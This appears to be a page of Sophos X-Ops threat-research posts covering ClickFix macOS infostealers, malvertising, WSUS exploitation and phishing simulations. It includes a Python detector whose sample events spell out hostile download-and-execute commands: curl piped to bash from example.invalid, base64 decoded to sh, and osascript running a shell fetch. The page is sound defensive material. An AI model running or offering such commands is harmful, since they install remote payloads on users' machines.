Sophos X-Ops

A task force composed of our SophosLabs, SecOps, MDR, and SophosAI teams working together towards one goal: protecting our customers.
The Sophos X-Ops blog: https://news.sophos.com/en-us/category/threat-research/

ClickFix is an increasingly common social engineering technique, which threat actors use to trick users into installing malicious software on their devices. Historically, it’s been aimed at Windows users – but recently we’ve seen three ClickFix campaigns targeting macOS users.

These campaigns, which involve the MacSync infostealer, suggest that approaches and tactics are evolving – possibly in response to investigation and disruption efforts, but also perhaps reflecting wider social and technological trends.

For example: in Dec 2025, we observed a ClickFix campaign that leveraged shared ChatGPT conversations containing malicious links, leading to MacSync infections.

A more recent campaign, in February, featured an updated MacSync variant – a multistage loader-as-a-service model, using shell-based loaders, API key-gated C2 infrastructure, dynamic AppleScript payloads, and aggressive in-memory execution.

Shell-based implementations are more effective and more evasive for threat actors than native Mach-O binaries.

This latest variant also has the ability to patch Ledger Live with malicious logic – which could lead to crypto wallets being drained of funds.

It’s important to take into account the wider context of the increased risk to macOS users. Mainstream malware now regularly affects macOS users – particularly infostealers, which account for a significant share of the macOS detections we see in telemetry.

We expect this region of the threat landscape to keep evolving, and rapidly. Read the full article here: https://www.sophos.com/en-us/blog/evil-evolution-clickfix-and-macos-infostealers

Evil evolution: ClickFix and macOS infostealers

Across three recent campaigns, Sophos X-Ops notes shifts in both lures and malware capabilities, as threat actors leveraging ClickFix techniques increasingly target macOS users with infostealers

SOPHOS
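The defining ClickFix step is a user pasting a command into Terminal, so the shell-based, in-memory loaders described above leave a recognisable trace in process execution telemetry: a terminal-spawned shell fetching a remote script and piping it into another shell, decoding an inline base64 blob into a shell, or invoking osascript with inline AppleScript. The following is an added example (not Sophos detection logic and not code from the article) that scores constructed process events against such patterns. The regexes, weights, threshold and the event schema are all this example's own assumptions; example.invalid is a reserved, non-resolving domain.

```python
import re

# Heuristics for the command lines a ClickFix lure asks a macOS user to paste
# into Terminal. Patterns and weights are this example's assumptions about what
# a shell-based, in-memory loader looks like. Each entry: name -> (regex, weight).
INDICATORS = {
    # "curl ... | bash": fetch a script and run it without writing it to disk
    "remote_script_piped_to_shell": (
        re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b"), 3),
    # eval "$(curl ...)" / sh -c "$(curl ...)": the same idea via command substitution
    "remote_script_in_substitution": (
        re.compile(r"\b(eval|(ba|z)?sh\s+-c)\s+[\"']?\$\((curl|wget)\b"), 3),
    # decode an inline base64 blob straight into a shell
    "base64_decode_to_shell": (
        re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|;&]*\|\s*(ba|z)?sh\b"), 2),
    # inline AppleScript, typically carrying a "do shell script" call
    "inline_applescript": (re.compile(r"\bosascript\s+-e\b"), 1),
    # strip the quarantine attribute so Gatekeeper does not inspect the payload
    "quarantine_bypass": (
        re.compile(r"\bxattr\s+(-c|-d\s+com\.apple\.quarantine)\b"), 2),
    # keep the payload alive after the Terminal window is closed
    "detach_from_terminal": (re.compile(r"\b(nohup|disown)\b|&\s*$"), 1),
}

# Parents a pasted command normally runs under (assumption for this example;
# a production rule would use full process ancestry).
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}

FLAG_THRESHOLD = 3


def analyze(event):
    """Return the indicators matched by one process event plus a score.

    event: dict with "pid", "parent" (parent process name) and "cmdline".
    """
    cmd = event["cmdline"]
    matched = [name for name, (rx, _w) in INDICATORS.items() if rx.search(cmd)]
    score = sum(INDICATORS[name][1] for name in matched)
    # A loader launched from an interactive terminal is the ClickFix signature;
    # weight it up, but only once something suspicious has already matched.
    if matched and event.get("parent") in INTERACTIVE_PARENTS:
        score += 1
    return {"pid": event["pid"], "score": score, "indicators": matched,
            "clickfix_candidate": score >= FLAG_THRESHOLD}


def triage(events):
    """Return only the flagged events, highest score first."""
    results = [analyze(e) for e in events]
    return sorted((r for r in results if r["clickfix_candidate"]),
                  key=lambda r: r["score"], reverse=True)


# Constructed process events (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 4101, "parent": "Terminal",
     "cmdline": 'bash -c "curl -fsSL https://example.invalid/x.sh | bash"'},
    {"pid": 4102, "parent": "Terminal",
     "cmdline": 'echo "$PAYLOAD_B64" | base64 -D | sh'},
    {"pid": 4103, "parent": "Terminal",
     "cmdline": "osascript -e 'do shell script \"curl -s https://example.invalid/p | sh\"'"},
    {"pid": 4104, "parent": "Terminal", "cmdline": "brew update && brew upgrade"},
    {"pid": 4105, "parent": "Terminal",
     "cmdline": "curl -sI https://example.invalid/ > /tmp/headers.txt"},
    {"pid": 4106, "parent": "Finder",
     "cmdline": "/usr/bin/xattr -d com.apple.quarantine /Applications/Notes.app"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

The benign curl (saving headers to a file) and the Homebrew upgrade score zero, while a lone quarantine-attribute removal by Finder stays under the threshold; it only becomes interesting in combination with a terminal-spawned download-and-execute chain.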

The 2026 Sophos Active Adversary Report is out — and despite the hype, we saw no AI-driven sea change in the threat landscape, based on the 600+ IR and MDR cases that made up our dataset. Attackers mostly stuck with what already works.

Abuse of legitimate tools remained consistent, as did the failure to block categories of tools that are known to be routinely abused.

Missing telemetry continued to make it difficult for blue teamers to spot the signal in the noise, and an ongoing lack of phishing-resistant multifactor authentication (MFA) gave the criminals a quiet way in.

The most concerning change has been years in the making: The dominance of identity-related root causes — brute-force attacks, phishing, and other compromised-credential tactics — for successful initial access.

This constellation of tactics leverages weaknesses that can’t be addressed by simple patch hygiene and occasionally acts as a bonus multiplier for attacks in progress.

Key takeaways:

1️⃣ GenAI adds speed, volume, and noise to the threat landscape… but for now, that’s about it.

2️⃣ Identity-related tactics such as compromised credentials, brute-force attacks, and phishing, are by far the most common reason attackers gain initial access.

3️⃣ Attackers have made few changes to specific tools, tactics, or procedures — though one weird blocking trick may make a huge difference for many enterprises.

4️⃣ Saving money by minimizing telemetry collection might be penny-wise, but it’s definitely pound-foolish.

5️⃣ Prevention still beats detection, both in outcomes and in time and effort spent defending.

Read the report here: https://www.sophos.com/en-us/blog/2026-sophos-active-adversary-report

Nowhere, man: The 2026 Active Adversary Report

AI headline hype didn’t deliver a sea change for practical defense — but one below-the-radar development should.

In September 2025, Sophos Managed Detection and Response (MDR) teams identified a malvertising campaign distributing an infostealer dubbed TamperedChef – believed to be part of a wider campaign known as EvilAI.

Previous coverage of this campaign suggests it began on June 26, 2025, with many of the associated websites being registered or first identified on that date. The sites were promoting a trojanized PDF editing application called AppSuite PDF Editor via Google Ads.

This application appeared legitimate to users, but silently deployed an infostealer upon installation, targeting Windows devices.

Although a significant proportion of victims were in Germany and the UK, this likely reflects the campaign’s widespread global reach rather than any deliberate targeting of specific regions; we identified 19 affected countries in total.

This large, multi-layered distribution network featured a delayed activation/dormancy period, decoy software, staged payload delivery, abuse of code-signing certificates, and efforts to evade endpoint protection mechanisms.

Users who installed AppSuite PDF Editor should consider any credentials stored in their browsers to be compromised.

Threat actors are well aware that malvertising can be a fruitful and effective infection vector. It’s very possible that the adversaries behind TamperedChef, and others, will cook from a similar recipe in the future.

Read the full article here: https://www.sophos.com/en-us/blog/tamperedchef-serves-bad-ads-with-infostealers-as-the-main-course

TamperedChef serves bad ads, with infostealers as the main course

Sophos X-Ops explores a malvertising campaign that leverages Google Ads to distribute an infostealer

We’ve recently observed an increase in a malicious threat actor campaign leveraging GoTo LogMeIn installers distributed via phishing emails. X-Ops’ Labs and MDR teams are currently huddling on an investigation that’s delivering some interesting detection twists.

The trouble starts, as trouble often does, with phishing emails. We’ve seen a wide variety in this investigation so far, from invitations spoofing well-known event-planning sites to unostentatious requests for bids on construction projects.

It got interesting when we looked at the installer itself. GoTo is of course a legitimate enterprise; our investigation found that the installer involved in these attempts is in fact legitimately signed with a valid certificate. That means it’s not simply a matter of flagging any LogMeIn installer as malicious or potentially unwanted.

The X-Ops team is closely monitoring the attacks abusing LogMeIn installers and is updating protection logic as needed, focusing on quick response to new indicators as well as developing proactive behavioral protection strategies. We’ll keep you posted.

In a new blog post out today, we discuss the pros and cons of phishing simulations, and our own philosophy and approach at Sophos. We also provide ten tips for organizations when planning simulations (full details in the article, link below):

  • Find the right cadence.
  • Pretexts should be realistic, but not unreasonable.
  • Reinforce positive behaviors rather than trying to catch people out.
  • Prioritize reports (and speed) over clicks.
  • Look beyond the click.
  • Doing nothing helps no one.
  • Complement simulations with novel forms of learning.
  • Use them to train security teams as well as end users.
  • Include everyone.
  • Build systems tolerant to human failure.

Read the full article here: https://news.sophos.com/en-us/2025/10/31/phake-phishing-phundamental-or-pholly/

Phake phishing: Phundamental or pholly?

Debates over the effectiveness of phishing simulations are widespread. Sophos X-Ops looks at the arguments for and against – and our own phishing philosophy

Sophos News

Debates around the effectiveness of phishing simulations are widespread. Supporters claim they can boost learning retention rates, help train users’ instincts, reduce risk, and contribute to developing a ‘security-first’ culture.

Detractors point to tick-box compliance, fatigue, unfair and unethical lures, punishing users who ‘fail’ phishing tests (e.g., extra-dull mandatory training, naming and shaming, disciplinary measures), and focusing on failure rather than success.

In fact, two recent (2021 and 2025) studies suggest that phishing training makes no significant difference to susceptibility, and could, counter-intuitively, make users more susceptible (although there are some important caveats to this).

But phishing is often the most prevalent entry mechanism for attackers. It’s cheap and easy, and generative AI may make it even easier. And threat actors know it works. So is there a way to make phishing exercises effective?

At Sophos, we think there is. We’ve been running internal simulations since 2019 – but, crucially, we don’t measure by failure. We measure by success.

Click rates aren’t that helpful, because it only takes one user to click – and they frame users as potential problems rather than potential assets. Instead, our key metric is how many users report phishing emails, and how quickly.

Why? Because reports are a highly tailored source of actionable threat intelligence. They allow us to triage, and follow an established process involving detonating attachments, looking up IOCs, threat hunting, blocking malicious domains, and clawing back emails from inboxes.

And we don’t want users to simply delete/ignore phishing emails. That puts us behind the pace during a real attack. We don’t congratulate people for something they DIDN’T do, but for something they DID. This empowers users to be a crucial line of defence, not the ‘weakest link.’

Our simulations are not about trying to catch users out, but training them to remember to hit Report. We frame it like this: we’re not trying to deceive people. We’re playing a game to help refresh their memory.
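Measuring a simulation by reports rather than clicks changes what the scoring code has to compute: the share of recipients who reported, how fast the first report arrived (that is what starts the response process), the median time to report, and whether users who clicked still reported afterwards. The following is an added example of such scoring (not Sophos's own tooling or metric implementation). The event schema and the ten-recipient campaign are constructed for the example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from statistics import median


@dataclass(frozen=True)
class SimEvent:
    """One user action in a simulation (constructed schema, not a Sophos format)."""
    user: str
    action: str          # "delivered", "clicked" or "reported"
    at: datetime


def score_campaign(sent_at, events):
    """Score a simulation by reporting behaviour rather than by click rate.

    Returns rates plus time-to-report figures. The first report is tracked
    separately from the median because it is the one that starts triage.
    """
    recipients = {e.user for e in events if e.action == "delivered"}
    if not recipients:
        raise ValueError("no delivered events; nothing to score")
    clicked = {e.user for e in events if e.action == "clicked"}
    reported = {e.user for e in events if e.action == "reported"}

    # Minutes from send to each user's first report (later duplicates ignored).
    first_report = {}
    for e in sorted(events, key=lambda ev: ev.at):
        if e.action == "reported" and e.user not in first_report:
            first_report[e.user] = (e.at - sent_at).total_seconds() / 60
    minutes = sorted(first_report.values())

    return {
        "recipients": len(recipients),
        "report_rate": round(len(reported) / len(recipients), 3),
        "click_rate": round(len(clicked) / len(recipients), 3),
        # Clicked, then realised and reported: the SOC still got its signal.
        "clicked_then_reported": len(clicked & reported),
        # Deleted or ignored: no signal either way, which is the outcome to reduce.
        "no_action": len(recipients - clicked - reported),
        "minutes_to_first_report": minutes[0] if minutes else None,
        "median_minutes_to_report": median(minutes) if minutes else None,
    }


# Constructed campaign of ten recipients (not real data).
SENT_AT = datetime(2025, 10, 31, 9, 0)


def _minutes_after_send(n):
    return SENT_AT + timedelta(minutes=n)


SAMPLE_EVENTS = [SimEvent(f"user{i}", "delivered", SENT_AT) for i in range(1, 11)] + [
    SimEvent("user1", "reported", _minutes_after_send(3)),
    SimEvent("user2", "reported", _minutes_after_send(7)),
    SimEvent("user3", "reported", _minutes_after_send(12)),
    SimEvent("user5", "clicked", _minutes_after_send(20)),
    SimEvent("user5", "reported", _minutes_after_send(45)),   # clicked, then reported
    SimEvent("user6", "clicked", _minutes_after_send(30)),
]

if __name__ == "__main__":
    for key, value in score_campaign(SENT_AT, SAMPLE_EVENTS).items():
        print(f"{key}: {value}")
```

On the constructed data the click rate is 20%, but the figures that matter for response are a 40% report rate, a first report three minutes after send, and the half of recipients who did nothing at all.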

Sophos researchers have identified real-world exploitation of a newly disclosed vulnerability in Windows Server Update Services (WSUS), where threat actors are harvesting sensitive data from organizations.

Following public release of proof-of-concept code, attackers began abusing the flaw to steal data from exposed servers across multiple industries — including universities, technology, manufacturing, and healthcare.

“This activity shows that threat actors moved quickly to exploit this critical vulnerability in WSUS to collect valuable data from vulnerable organizations.” — Rafe Pilling, Director of Threat Intelligence, Sophos.

Sophos telemetry has identified six incidents so far, though the real number is likely higher.

Organizations should apply patches promptly and review WSUS configurations to reduce the risk of exploitation.

🔗 Read more and get the full guidance:

https://news.sophos.com/en-us/2025/10/29/windows-server-update-services-wsus-vulnerability-abused-to-harvest-sensitive-data/

Windows Server Update Services (WSUS) vulnerability abused to harvest sensitive data

Exploitation of CVE-2025-59287 began after public disclosure and the release of proof-of-concept code

Sophos News